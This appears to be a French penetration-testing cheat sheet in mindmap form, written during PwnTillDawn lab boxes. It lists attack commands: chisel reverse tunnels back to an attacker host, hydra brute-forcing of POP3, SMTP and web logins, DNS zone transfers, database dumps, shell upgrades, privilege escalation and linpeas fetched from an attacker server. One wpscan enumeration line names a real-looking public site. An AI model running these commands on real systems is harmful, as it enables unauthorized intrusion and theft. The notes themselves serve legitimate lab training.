Pwntilldawn Mindmap FULL

もっと見る

Equity & Social Justice

Megan Zammitにより

Browser Fuzzing

Huy naにより

10E Solving Conflicts Topic Words

Mari Landråk Asbjørnsen Asbjørnsenにより

Intersectionality and Handmaid's Tale (AKA: My fav book ever)

Anya Tismaにより

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding

Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations



Sur l'host

chisel server -port 7777 --reverse

Verifier ce qui écoute sur localhost

NMAP

Nmap Automator

nmap -sV -sC -T5 -p- ip

nmap -sV -Pn -p- -T5 ip

sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS

! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH

Test de se co pour la bannière

Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3

hydra -l operator -P wordlist.txt ip pop3

Mysql

mysql -h localhost -u sql_user -p

mysqldump -u root -p --all-databases > alldb.sql

FTP

Login anon à vérif

showmount -e IP

NFS

sudo mount -t nfs ip:/remote /local

sudo umount 10.150.150.59:/nfsroot

Subtopic

rpcinfo IP

SMTP

hydra -l operator -P wordlist.txt ipip smtp

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup

netstat -antup

Dumb shell upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

script /dev/null -qc /bin/bash

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux

Other

grep -r pattern

search in files ( -recursive )

-r

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

Privesc

SUID

find / -perm -u=s -type f 2>/dev/null

searchsploit

searchsploit -m chemin

searchsploit xxxx

Python Library Hijacking

Script qui tourne en root avec des imports de librairies

LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Metasploit

Upgrade session : sessions -u

Windows

Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas

sudo python3 -m http.server port ( attaquant ) et wget

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress

Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u

Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters

python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération

Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms

Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit

Depixelise

Unredactor

Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram

https://piellardj.github.io/stereogram-solver/

Aperisolve

Steghide

steghide extract -sf screen.jpeg